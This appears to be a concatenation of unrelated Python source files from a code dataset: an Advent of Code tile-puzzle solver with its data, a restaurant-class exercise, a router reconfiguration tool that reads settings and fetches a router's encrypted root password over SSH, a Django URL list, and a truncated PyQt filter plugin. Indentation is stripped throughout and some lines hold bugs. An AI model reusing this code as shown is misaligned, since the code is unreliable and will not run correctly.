"0100100000",
"0000010101",
"1101100011",
"0000000101",
"0000000111",
"0000100100",
"0001011000",
],
"2887":[
"1111011010",
"1001100011",
"1001001000",
"1000000001",
"1101010001",
"1010011000",
"0001100010",
"1010010001",
"1010110000",
"1101101101",
],
"3697":[
"0110000011",
"1000000000",
"1110000000",
"0011010000",
"1100010100",
"1000100001",
"1000000001",
"0100000000",
"0101000000",
"1000100011",
],
"2081":[
"0111010010",
"0010100001",
"0000001011",
"1001010011",
"1000110000",
"1000010001",
"0111000000",
"0010010101",
"0010000111",
"1000100011",
],
"2383":[
"0000110110",
"0110000001",
"0100000001",
"1011010001",
"1001001001",
"1101000001",
"0010100100",
"1000010000",
"0101010100",
"1001010100",
],
"2557":[
"1100101110",
"0010000000",
"0100001100",
"0001010000",
"0001101000",
"1010100001",
"0000000011",
"1000001001",
"1100000100",
"0111001011",
],
"3637":[
"1001011101",
"0001001110",
"1000000010",
"0000000101",
"0001010000",
"0000000000",
"0000000001",
"0000000001",
"0111001110",
"1110101001",
],
"3989":[
"0001010101",
"0010011100",
"1000100111",
"1000011000",
"1000010101",
"0000000011",
"1011000011",
"1000001011",
"1011001001",
"0000001000",
],
"2221":[
"1000110111",
"0000010010",
"0100100001",
"0000010110",
"0010110001",
"0000000011",
"1000001111",
"0100000001",
"1011000100",
"1101111000",
],
"1523":[
"0010011110",
"0101000000",
"1000101101",
"1110010010",
"0000001100",
"0000000001",
"0001001100",
"1000010101",
"1000000100",
"0100010001",
],
"1583":[
"0111101011",
"1000101011",
"0000010000",
"0001000101",
"0111000001",
"0011010001",
"1011000000",
"1000011000",
"1001000001",
"0111100100",
],
"3919":[
"0010011000",
"0100010000",
"1011110100",
"0000000000",
"1001000000",
"1000000001",
"0001101001",
"0001000000",
"1001100001",
"0100001010",
],
"2381":[
"0000111111",
"0011001101",
"1000111100",
"0001000000",
"1110001011",
"1000100000",
"1011000011",
"0000100001",
"0000001010",
"0001101101",
],
"3923":[
"1111101010",
"0100000100",
"0000100000",
"1000100001",
"1100000000",
"0000001001",
"0000010001",
"1010001000",
"0111100001",
"1111000010",
],
"2953":[
"1010111001",
"0000101000",
"0101000011",
"1000110001",
"1000110010",
"1110000001",
"0101101000",
"0000000001",
"1101011010",
"0010001001",
],
"2441":[
"0000101010",
"1100101000",
"0000010101",
"1000010000",
"1001000111",
"1000010000",
"1000000111",
"0010010111",
"0100000001",
"0101011000",
],
"3023":[
"1010111110",
"0010000011",
"1001010001",
"0100001001",
"0010100011",
"1100000100",
"0100001011",
"1000000000",
"1111010000",
"1001101000",
],
"2659":[
"0001100100",
"1100011001",
"0100010011",
"1100001111",
"0000101111",
"1101000000",
"0010110001",
"0101001110",
"0000101101",
"0110011101",
],
"1069":[
"0110110011",
"1000000000",
"0100001000",
"1100000000",
"0010000001",
"0111000101",
"1100011001",
"1001010000",
"0010000010",
"0100111001",
],
"1181":[
"1101101100",
"1000001001",
"0010001001",
"0110100000",
"1000100001",
"1010000001",
"0001000101",
"1000011001",
"1001110100",
"0010010001",
],
"1663":[
"0000100100",
"0111011111",
"1001000101",
"0000000000",
"0000000001",
"0101100001",
"0110000000",
"0000000100",
"1100000011",
"0101100010",
],
"3779":[
"0110110101",
"1000100001",
"1001100001",
"0100010000",
"1100100010",
"0000000001",
"1000100011",
"1001000000",
"1110000010",
"0011001010",
],
"1013":[
"1011010101",
"0100100000",
"0101011000",
"1110000001",
"0101100101",
"0100100110",
"0000000000",
"0000100001",
"1000000101",
"1001110111",
],
"1747":[
"0101001110",
"0000000110",
"1001100100",
"0010101000",
"1100000011",
"1000000110",
"0000110011",
"0010100011",
"1000100100",
"1101110110",
],
"3931":[
"0011100100",
"1001000000",
"1100001000",
"0110001000",
"1000000001",
"0000101010",
"0111000001",
"0100100000",
"1101000000",
"1101111001",
],
"2593":[
"1011001001",
"0110000011",
"1011100011",
"1001000000",
"1100110001",
"1011000000",
"0010101001",
"0010000001",
"0001001000",
"0111101100",
],
"3677":[
"1010101011",
"0000100000",
"0100110000",
"0000011001",
"0010010100",
"0000000000",
"1110011000",
"1101111101",
"1000100000",
"1010011111",
],
"2633":[
"0100111101",
"0111000100",
"0000001001",
"0000111000",
"1001011000",
"0100110101",
"1100000101",
"1000000011",
"1000101001",
"1010010100",
],
"2129":[
"0011011100",
"1100100010",
"0010001000",
"1000001000",
"0000001001",
"0010110001",
"0000100111",
"1100001000",
"0000000000",
"0101011000",
],
"2029":[
"1101101110",
"1001000000",
"1100000010",
"0101110110",
"0001100011",
"1001000011",
"0001110101",
"0000100011",
"0010010000",
"0001000001",
],
"1873":[
"0100010001",
"1000110011",
"1101000001",
"1010010011",
"0000100000",
"0010011100",
"0000001001",
"0000000001",
"1000100010",
"1101100001",
],
"1567":[
"1100110010",
"0000110010",
"0010000010",
"0101000001",
"1010110001",
"0000110001",
"1000011001",
"0000101001",
"0100011001",
"1101001101",
],
"3571":[
"1111000010",
"0110111011",
"0000000001",
"0010000010",
"0000110100",
"0101000001",
"1000000000",
"1000010001",
"1000000001",
"1001011010",
],
"2671":[
"0001001100",
"0000000000",
"1001001100",
"1100001000",
"1000000011",
"1110100101",
"0011000011",
"1000100000",
"0100010001",
"0000001100",
],
"3229":[
"0001010010",
"1000000000",
"0001100000",
"0001000001",
"1011000000",
"0010101011",
"0001111000",
"0000011001",
"1000000000",
"0101110000",
],
"3083":[
"1100010101",
"1011100001",
"1001000101",
"0100010000",
"1000100001",
"1100010101",
"0010000001",
"1010000101",
"1001010100",
"0100100000",
],
"2239":[
"1111110101",
"1101101101",
"0000000110",
"1001000000",
"1100000111",
"0000000011",
"0010000100",
"1000111100",
"0000111100",
"0010111110",
],
"3581":[
"1110100111",
"1010100001",
"0001010011",
"1001000111",
"0101101000",
"1001001000",
"0001010101",
"1000100110",
"1100001100",
"1100011100",
],
"1061":[
"0000011100",
"1110001000",
"1010001110",
"0000000010",
"0100000101",
"1100011011",
"0000000001",
"1000011010",
"0100000100",
"0100010110",
],
"3967":[
"0011111111",
"1100000000",
"0110100010",
"0011011011",
"1010000101",
"0100000001",
"0000100000",
"1011000000",
"1100110100",
"0010001011",
],
"2749":[
"0111111101",
"1001001000",
"0001000000",
"0000100001",
"0000101110",
"0101010000",
"0100100000",
"0001000010",
"1011010010",
"1111101110",
],
"1811":[
"1010111010",
"1000000000",
"0000000001",
"0001000000",
"0000000011",
"0000000000",
"0111110001",
"1111010000",
"1000001000",
"1010101001",
],
"2477":[
"1111010011",
"0010110011",
"1000011000",
"1010001100",
"1111000011",
"1000000010",
"1111100001",
"0010000000",
"0000001000",
"0101101101",
],
"1949":[
"1011001111",
"1011001010",
"1110000000",
"1101000001",
"1001110011",
"1100000010",
"0000010011",
"1100011001",
"0100000000",
"1101101001",
],
"2099":[
"0011010011",
"0000101000",
"1000010101",
"0001001000",
"1100000110",
"1001110111",
"0100000101",
"0010000001",
"0000001000",
"0110010100",
],
"2767":[
"0101110100",
"0010101000",
"0001100000",
"0010000000",
"0000001001",
"0000000101",
"0000010000",
"1010110011",
"0010010000",
"1100010111",
],
"3251":[
"0011010000",
"0000000100",
"0000010101",
"0100110011",
"0101100001",
"1010000100",
"1100100001",
"0000000001",
"0010010011",
"0000111100",
],
"3833":[
"1001111011",
"0001000000",
"0100000101",
"1100110001",
"0000011001",
"1001010000",
"0001100011",
"0010110001",
"0000000011",
"1100001010",
],
"3089":[
"0010000000",
"0000010000",
"1111100010",
"1100100100",
"0101011011",
"0010110010",
"0000000100",
"1100100001",
"0001001000",
"0010111001",
],
"2861":[
"1000000100",
"0001000001",
"1000001001",
"1100000001",
"0100001001",
"1100101000",
"0000000010",
"1000000001",
"1011000111",
"1010111000",
],
"1489":[
"1101101011",
"0100000001",
"1001011001",
"1010000000",
"1010000100",
"1000001101",
"0110011110",
"0000010101",
"0000000111",
"1010100101",
],
"1801":[
"1000011111",
"1010000001",
"0000000001",
"1010000011",
"1000010001",
"0110001000",
"1101110101",
"0101001101",
"0010101001",
"1100111010",
],
"2677":[
"1010001011",
"0000000000",
"1000101101",
"1010000101",
"1000001001",
"0010010011",
"1011100101",
"1101000001",
"0000000011",
"1101111010",
],
"3797":[
"0011111010",
"1010010010",
"0010010110",
"0011010100",
"0110010000",
"0110110010",
"1000000111",
"0000000010",
"0101100010",
"0010011111",
]
}
from collections import defaultdict
tileborders = dict()
freq = defaultdict(int)
ownbyborder = defaultdict(list)
for k,v in m.items():
#clockwise
top = int(v[0],2)
right = int("".join([s[-1] for s in v]),2)
bottom = int(v[9][-1::-1],2)
left = int("".join([s[0] for s in v])[-1::-1],2)
#Counterclockwise
pot = int(v[0][-1::-1],2)
tfel = int("".join([s[0] for s in v]),2)
mottob = int(v[9],2)
thgir = int("".join([s[-1] for s in v])[-1::-1],2)
borders = [top, right, bottom, left, pot, tfel, mottob, thgir]
tileborders[k] = borders
for border in borders:
freq[border] += 1
ownbyborder[border].append(k)
coverfreq=defaultdict(int)
ret = 1
for k,v in m.items():
coveredborders = 0
for border in tileborders[k]:
if freq[border] > 1:
coveredborders += 1
coverfreq[coveredborders] += 1
if coveredborders == 4:
ret *= int(k)
onecorner = k
print("problem A", ret)
#make onecorner the top left one
borders = tileborders[onecorner]
connected = []
for i, border in enumerate(borders):
if freq[border] > 1:
connected.append((i, border)) #border pos, border value
assert len(connected) == 4
# Now I have the values of the two connected borders
# I'll use the first one to seed the first row
row=[(onecorner,connected[0], connected[1])]
sortedtiles = []
for i in range(12):
for _ in range(11):
bordertomatch = row[-1][1][1]
assert len(ownbyborder[bordertomatch]) == 2
for tile in ownbyborder[bordertomatch]:
if tile != row[-1][0]:
newtile = tile
matchingpos = tileborders[newtile].index(bordertomatch)
nextmatchingpos = [6,5,4,7,2,1,0,3][matchingpos]
bottommatchingpos = [7,6,5,4,3,2,1,0][matchingpos]
row.append((newtile, (nextmatchingpos, tileborders[newtile][nextmatchingpos]), (bottommatchingpos, tileborders[newtile][bottommatchingpos])))
sortedtiles.append(row)
if i < 11: #prepare next row, we have to match the bottom of the first
bordertomatch = row[0][2][1]
assert len(ownbyborder[bordertomatch]) == 2
for tile in ownbyborder[bordertomatch]:
if tile != row[0][0]:
newtile = tile
matchingpos = tileborders[newtile].index(bordertomatch)
nextmatchingpos = [5, 4, 7, 6, 1, 0, 3, 2][matchingpos]
bottommatchingpos = [6, 5, 4, 7, 2, 1, 0, 3][matchingpos]
row = [(newtile, (nextmatchingpos, tileborders[newtile][nextmatchingpos]), (bottommatchingpos, tileborders[newtile][bottommatchingpos]))]
def convert(tile, right):
#borders off
t = [s[1:-1] for s in m[tile][1:-1]]
if right == 0:
return([[s[i] for s in reversed(t)] for i in range(8)])
if right == 1:
return(t)
if right == 2:
return([[s[i] for s in t] for i in range(7, -1, -1)])
if right == 3:
return([list(reversed(s)) for s in reversed(t)])
if right == 4:
return([[s[i] for s in reversed(t)] for i in range(7,-1,-1)])
if right == 5:
return([list(reversed(s)) for s in t])
if right == 6:
return([[s[i] for s in t] for i in range(8)])
if right == 7:
return([s for s in reversed(t)])
assert false
#first we will do a 1/0 bidimensional array for the map
map = [ [0] * 12 * 8 for _ in range(12 * 8)]
for row in range(len(sortedtiles)):
for col in range(len(sortedtiles[0])):
tilecell = sortedtiles[row][col]
t = convert(tilecell[0], tilecell[1][0])
for subrow in range(len(t)):
for subcol in range(len(t[0])):
map[8*row+subrow][8*col+subcol]=t[subrow][subcol]
from pprint import pprint
#pprint(map)
for r in map:
print("".join(r))
# Now make it a list of 12*8 INTs
nbitmap = [int("".join(row),2) for row in map]
# And a rotated version of the map
rmap = [[r[i] for r in map] for i in range(12*8)]
rbitmap = [int("".join(row),2) for row in rmap]
# FINALLY, try to find dragons
dragon=[
0b00000000000000000010,
0b10000110000110000111,
0b01001001001001001000
]
##12345678901234567890
nogard=[
0b01000000000000000000,
0b11100001100001100001,
0b00010010010010010010
]
seacreatures = 0
for j, bitmap in enumerate([nbitmap, rbitmap]):
dragons = 0
nogards = 0
inversedragons = 0
inversenogards = 0
for row in range(12*8-3):
for column in range(12*8-20):
dragonfound = True
nogardfound = True
inversedragonfound = True
inversenogardfound = True
for i in [0,1,2]:
dragonfound = dragonfound and (((dragon[i]<<column) & (bitmap[row+i]))==(dragon[i]<<column))
nogardfound = nogardfound and (((nogard[i]<<column) & (bitmap[row+i]))==(nogard[i]<<column))
inversedragonfound = inversedragonfound and (((dragon[i]<<column) & (bitmap[row+2-i]))==(dragon[i]<<column))
inversenogardfound = inversenogardfound and (((nogard[i]<<column) & (bitmap[row+2-i]))==(nogard[i]<<column))
if dragonfound: dragons +=1
if nogardfound: nogards +=1
if inversedragonfound: inversedragons +=1
if inversenogardfound: inversenogards +=1
print(j, dragons, nogards, inversedragons, inversenogards)
seacreatures = max(seacreatures, dragons, nogards, inversedragons, inversenogards)
def countbits(arr):
ret = 0
for row in arr:
ret += bin(row).count("1")
return(ret)
print("Problem B", countbits(nbitmap) - seacreatures * countbits(dragon))
#pprint(bitmap) | StarcoderdataPython |
1653463 | <gh_stars>0
#Done by <NAME> in 04/07/2020
"""
Start with your program from Exercise 9-1 (page 162).
Add an attribute called number_served with a default value of 0. Create an
instance called restaurant from this class. Print the number of customers the
restaurant has served, and then change this value and print it again.
Add a method called set_number_served() that lets you set the number
of customers that have been served. Call this method with a new number and
print the value again.
"""
#Number served
class Restaurant:
"""An attempt to model a restaurant."""
def __init__(self, restaurante_name, cuisine_type):
self.restaurante_name = restaurante_name
self.cuisine_type = cuisine_type
self.number_served = 0
def describe_restaurant(self):
"""Prints information about the restaurant."""
msg = f"{self.restaurante_name} is a {self.cuisine_type} restaurant."
print(msg)
def open_restaurant(self):
"""Prints a message indicating the restaurant is open."""
msg = f"{self.restaurante_name} is now open!!"
print(msg)
def set_number_served(self, number_served):
"""Ability to set the number the costumers that've been served."""
self.number_served = number_served
def increment_number_served(self, increment):
"""Ability to increment the no. of costumers that've been served."""
self.number_served += increment
restaurant = Restaurant('Mercantel', 'cozinha')
restaurant.describe_restaurant()
restaurant.open_restaurant()
print(f"\nRestaurant has served: {restaurant.number_served} costumers.")
restaurant.number_served = 34
print(f"Restaurant has served: {restaurant.number_served} costumers.")
restaurant.set_number_served(100)
print(f"Restaurant has served: {restaurant.number_served} costumers.")
restaurant.increment_number_served(222)
print(f"Restaurant has served: {restaurant.number_served} costumers.")
| StarcoderdataPython |
3299155 | # stdlib
import json
import re
import traceback
from typing import Any, Dict, Optional
# libs
import netaddr
# local
from bin import RouterMixin, utils
import settings
ADDRESS_NAME_SUB_PATTERN = re.compile(r'[\.\/:]')
class RouterScrub(RouterMixin):
def run(self):
self.run_router()
def prompt(self):
print()
utils.colour_print('(colour_cmd)\u250D' + ('\u2501' * 30) + '\u2511')
utils.colour_print('\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 12) + '(colour_warning)WARNING(colour_cmd)' + (' ' * 11) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)Deploying a router deletes'
'(colour_cmd)' + (' ' * 2) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)all of the configuration'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 8) + '(colour_clear)on that device'
'(colour_cmd)' + (' ' * 8) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 6) + '(colour_clear)Deploying a router'
'(colour_cmd)' + (' ' * 6) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)ALREADY in production'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)will cause service outages.'
'(colour_cmd)' + ' ' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)Make sure you have read'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 4) + '(colour_clear)the "help" and updated'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)settings file correctly.'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Y or y '
'(colour_clear)to continue.(colour_cmd)' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Any key '
'(colour_clear)to exit.(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2515' + ('\u2501' * 30) + '\u2519(colour_clear)')
print()
def run_router(self):
try:
self.prompt()
if input() not in ['Y', 'y']:
return
utils.line_break()
print()
# loading settings data
utils.colour_print('Reading the settings file...')
# validating map_access_list
utils.colour_print('Validating MAP_ACCESS_LIST ...')
map_access_list = settings.MAP_ACCESS_LIST
for firewall in map_access_list:
self.validate_firewall(firewall)
clouds = settings.clouds
if clouds[0]['name'] in ['', None]:
utils.error(f'Invalid cloud name, Please edit the settings file correctly')
return
label = f'All available clouds in the settings file are:'
utils.colour_print(
'┌─────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^49}│')
utils.colour_print(
'├───────────┬─────────────────────────────────────┤',
)
utils.colour_print(
'│ id │ Name │',
)
utils.colour_print(
'├───────────┼─────────────────────────────────────┤',
)
cloud_ids = []
for cloud in clouds:
cloud_ids.append(cloud['id'])
utils.colour_print(f'│{cloud["id"]:^11}│{cloud["name"]:^37}│')
utils.colour_print(
'└───────────┴─────────────────────────────────────┘',
)
cloud_id = input(
utils.colour('(colour_warning)Select the cloud by entering "id" of the cloud.(colour_clear): '),
)
if cloud_id not in cloud_ids:
utils.error('Invalid cloud id, exiting. Please try again with correct cloud id.')
return
the_cloud = None
for cloud in clouds:
if cloud['id'] == cloud_id:
the_cloud = cloud
# validating the cloud settings
utils.colour_print('Validating COP_ACCESS_LIST ...')
cop_access_list = the_cloud['COP_ACCESS_LIST']
for firewall in cop_access_list:
self.validate_firewall(firewall)
pods = the_cloud['pods']
label = f'All available pods from the cloud #{the_cloud["name"]} are:'
utils.colour_print(
'┌───────────────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^59}│')
utils.colour_print(
'├───────────┬────────────────────────────────────┬──────────┤',
)
utils.colour_print(
'│ id │ Name │ Type │',
)
utils.colour_print(
'├───────────┼────────────────────────────────────┼──────────┤',
)
pod_ids = []
for pod in pods:
pod_ids.append(pod['id'])
utils.colour_print(f'│{pod["id"]:^11}│{pod["name"]:^36}│{pod["type"]:^10}│')
utils.colour_print(
'└───────────┴────────────────────────────────────┴──────────┘',
)
pod_id = input(
utils.colour('(colour_warning)Select the pod by entering "id" of the pod.(colour_clear): '),
)
if pod_id not in pod_ids:
utils.error('Invalid pod id, exiting. Please try again with correct pod id.')
return
the_pod = None
for pod in pods:
if pod['id'] == pod_id:
the_pod = pod
public_port_config = []
# validating the pod settings
utils.colour_print('validating IPv4_link_subnet...')
for subnet in the_pod['IPv4_link_subnet']:
if subnet['address_range'] != '':
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_link_subnet #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
utils.colour_print('validating IPv4_pod_subnets...')
for subnet in the_pod['IPv4_pod_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_pod_subnets #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
utils.colour_print('validating IPv6_link_subnet...')
for subnet in the_pod['IPv6_link_subnet']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv6_link_subnet #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv6_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
mgmt_port_config = []
utils.colour_print('validating IPv6_pod_subnets...')
for subnet in the_pod['IPv6_pod_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv6_pod_subnets #{subnet}')
exit()
address = subnet['address_range'].split('/')
subnet['address_range'] = f'{address[0]}10:0:1/64'
subnet['gateway'] = f'{address[0]}10:0:1'
mgmt_port_config.append(subnet)
utils.colour_print('validating IPv4_RFC1918_subnets...')
for subnet in the_pod['IPv4_RFC1918_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_RFC1918_subnets #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_RFC1918_subnets #{subnet}')
exit()
mgmt_port_config.append(subnet)
access_addrs = map_access_list + cop_access_list
mgmt_access_addresses = []
for item in access_addrs:
# an address is defined with name in router, the name can be any unique so is taken from ip address
# itself by converting its non integers like '.' , '/', ':' to '-'.
item['source_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['source_address'])
item['destination_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['destination_address'])
mgmt_access_addresses.append(item)
template_data: Optional[Dict[str, Any]]
template_data = {
'name_servers': settings.ROUTER_NAME_SERVERS,
'mgmt_access_addresses': mgmt_access_addresses,
'robot_rsa': settings.ROBOT_RSA,
'rocky_rsa': settings.ROCKY_RSA,
'administrator_encryp_pass': settings.ADMINISTRATOR_ENCRYP_PASS,
'api_user': settings.API_USER_PASS,
'radius_server_address': settings.RADIUS_SERVER_ADDRESS,
'radius_server_secret': settings.RADIUS_SERVER_SECRET,
'location': the_pod['location'],
'name': the_pod['name'],
}
utils.line_break()
print()
# Get the oob router
utils.colour_print('(colour_prompt)Please enter correct OOB ip of the router to be scrubbed(colour_clear).')
utils.colour_print('\r - e.g 10.S.R.U where S:site number; R:rack number; U:unit location')
utils.colour_print('\r - each must be in range 0-254')
oob_ip = self.user_input_valid_address('')
utils.line_break()
print()
# SSHing into router for router model
utils.colour_print('(colour_prompt)Fetching the router model...(colour_clear)')
router_model = RouterScrub.router_model(oob_ip)
if not router_model:
utils.error(f'Failed to fetch router model for given ip #{oob_ip}, Check the oob ip and try again.')
return
utils.colour_print(
f'The router model for given ip #{oob_ip} is (colour_success){router_model}(colour_clear)',
)
utils.line_break()
print()
# oob 10.S.R.U S:site; R:rack; U:unit
template_data['router'] = {
'router_ip': oob_ip,
'router_location': oob_ip.replace('.', ''), # 10SRU
'router_model': router_model,
}
# sshing into router for root encrypted password
utils.colour_print('(colour_prompt)Fetching the root encrypted password...(colour_clear)')
root_encrypt_password = RouterScrub.root_encrypted_password(oob_ip)
if not root_encrypt_password:
utils.error(f'Failed to fetch root encrypted password from router.')
return
utils.colour_print(
f'Found root encrypted password of router #{oob_ip}',
)
template_data['root_encrypted_password'] = root_encrypt_password
utils.line_break()
print()
# confirm if router model is fibre or copper in case SRX345-DUAL-AC
if router_model in ['SRX345-DUAL-AC', 'SRX345']:
router_model = 'SRX345'
utils.colour_print('(colour_prompt)Type of router cabling: ')
utils.colour_print('(colour_prompt)\r - 1. Copper')
utils.colour_print('(colour_prompt)\r - 2. Fibre')
option = ''
while option not in ['1', '2']:
option = utils.user_input_validate(
utils.colour('(colour_warning)Please enter "1" for Copper or "2" for Fibre.(colour_clear)'),
)
if str(option) == '1':
router_model = f'{router_model}-Copper'
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
if str(option) == '2':
router_model = f'{router_model}-Fibre'
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
else:
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
utils.line_break()
print()
# Prepare the router's specs from json.
try:
with open('data/router_specs.json', 'r') as f:
template_data['ports'] = json.load(f)['routers'][f'{router_model}']
except:
utils.error('An error occurred while preparing router scrub')
traceback.print_exc()
return
# Collect the template data.
for port in template_data['ports']:
# oob is already taken
if port['function'] == 'OOB':
port['port_configs'].append(
{
'ip': oob_ip,
'mask': 16, # /16 for oob is by design, if changes should reflect here.
'type': 'inet',
'gateway': f'10.{oob_ip.split(".")[1]}.0.1',
},
)
# Management
if port['function'] == 'Management':
for address in mgmt_port_config:
ip = address['address_range'].split('/')
port['port_configs'].append(
{
'ip': ip[0],
'mask': ip[1],
'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
'gateway': address['gateway'],
},
)
# Public
if port['function'] == 'Floating':
for address in public_port_config:
ip = address['address_range'].split('/')
port['port_configs'].append(
{
'ip': ip[0],
'mask': ip[1],
'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
'gateway': address['gateway'],
},
)
# All data check
label = f'Router #{router_model} {oob_ip} ports and IPs'
utils.colour_print(
'┌─────────────────────────────────────────────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^89}│')
utils.colour_print(
'├───────────┬─────────────┬───────────────────────────┬───────┬───────────────────────────┤',
)
utils.colour_print(
'│ Name │ Function │ IPs │ Mask │ Gateway │',
)
utils.colour_print(
'├───────────┼─────────────┼───────────────────────────┼───────┼───────────────────────────┤',
)
for port in template_data['ports']:
function = port['function']
name = port['name']
if function != 'Private':
port_configs = port['port_configs']
for i, ip in enumerate(port_configs):
# proper print
if i == 0:
utils.colour_print(
f'│{name:^11}│{function:^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
)
else:
utils.colour_print(
f'│{"":^11}│{"":^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
)
else:
utils.colour_print(
f'│{name:^11}│{function:^13}│{"-":^27}│{"-":^7}│{"-":^27}│',
)
utils.colour_print(
'└───────────┴─────────────┴───────────────────────────┴───────┴───────────────────────────┘')
utils.line_break()
yes = input(
utils.colour('If you want to continue press Y or y, else press any key to stop.: '),
)
utils.line_break()
print()
if yes in ['Y', 'y']:
RouterScrub.scrub(template_data)
except:
utils.error('An error occurred while configuring ports on router')
traceback.print_exc()
@staticmethod
def validate_address(address):
"""
validates the given address or address range
"""
try:
if netaddr.IPNetwork(address):
return True
except:
address = address
utils.colour_print(f'(colour_warning) {address} is not a valid IP address.(colour_clear)')
return False
@classmethod
def user_input_valid_address(cls, print_statement: str):
"""
takes user input and verifies and return valid address.
"""
address = ''
while address == '':
address = utils.user_input_validate(print_statement)
if address:
if cls.validate_address(address):
break
address = ''
return address
@classmethod
def validate_firewall(cls, firewall):
"""
takes a firewall rule dict with source address, destination address, port and protocol
:param firewall:
:return: nothing if everything is right otherwise fails gracefully
"""
if 'source_address' not in firewall.keys():
utils.error(f'"source_address" is not defined for firewall # {firewall}')
exit()
if firewall['source_address'] == 'any':
pass
elif not cls.validate_address(firewall['source_address']):
utils.error(f'Invalid "source_address" for firewall # {firewall}')
exit()
if 'destination_address' not in firewall.keys():
utils.error(f'"destination_address" is not defined for firewall # {firewall}')
exit()
if firewall['destination_address'] == 'any':
pass
elif not cls.validate_address(firewall['destination_address']):
utils.error(f'Invalid "destination_address" for firewall # {firewall}')
exit()
if 'port' not in firewall.keys():
utils.error(f'"port" is not defined for firewall #{firewall}')
exit()
if firewall['port'] == 'any':
pass
else:
ports = firewall['port'].split('-')
for port in ports:
if int(port) not in range(65536):
utils.error(f'Invalid port value # {port} of firewall #{firewall}, it must be in range 0 to 65536')
exit()
if 'protocol' not in firewall.keys():
utils.error(f'"protocol" is not defined for firewall #{firewall}')
exit()
if firewall['protocol'] not in ['tcp', 'upd', 'any']:
utils.error(f'Invalid protocol for firewall #{firewall}, it can only be "tcp" or "udp", or "any".')
exit()
| StarcoderdataPython |
60182 | <reponame>Brownie-in-Motion/libwherey
from django.contrib import admin
from django.urls import path
from django.conf.urls import url
import web.views
urlpatterns = [
path('admin/', admin.site.urls),
url(r"^$", web.views.homepage),
url(r"^about$", web.views.about),
url(r"^api/libraries/(?P<pk>[0-9]+)$", web.views.LibraryDetail.as_view()),
url(r"^api/libraries$", web.views.LibraryList.as_view()),
]
| StarcoderdataPython |
4802117 | '''
Created on 29.11.2016
@author: simon
'''
from plugins import plugins
from PyQt4 import QtGui,QtCore
from ctools.filters import IIR
from scipy.signal.filter_design import iirfilter
class BandPass(object):
'''
Plugin for PyDaq which adds some filters (iir and fft)
'''
def __init__(self, app):
'''
Adds a Dialog for applying a Bandpassfilter with cutoff-frequncies f1,f2 to the underlying data.
@type app: gui.qtgui.UI_Main
'''
filter=QtGui.QAction("BandFilter",app)
app.ui.plotcontrols.addAction(filter)
filter.triggered.connect(lambda: FilterDialog(app).show() if not FilterDialog.instance else FilterDialog.instance.restore())
pass
class FilterDialog(QtGui.QDialog):
"""
Dialog to apply a Filter to a line drawn by gui.plot2. For each line an instance of
BandpassWidget is added
"""
instance=None
def __init__(self, app):
"""
@type app: gui.qtgui.UI_Main
"""
QtGui.QDialog.__init__(self, app)
FilterDialog.instance=self
self.setWindowTitle("Filters")
self.app=app
self.colsAdjusted=0
lo=QtGui.QGridLayout()
#lo.setAlignment(QtCore.Qt.AlignCenter)
self.setLayout(lo)
i=0
self.resize(500,200)
lbls="Line,Type,Band,Order,fmin,fmax,FFT,Invert,On".split(',')
self.header=[]
for s in lbls:
lbl=QtGui.QLabel(s)
lo.addWidget(lbl,0,i)
self.header.append(lbl)
i+=1
i=0
frame=QtGui.QScrollArea()
frame.setFrameShape(0)
qslo=QtGui.QGridLayout()
qslo.setMargin(0)
qslo.setAlignment(QtCore.Qt.AlignTop)
frame.setLayout(qslo)
lo.addWidget(frame,1,0,2,0)
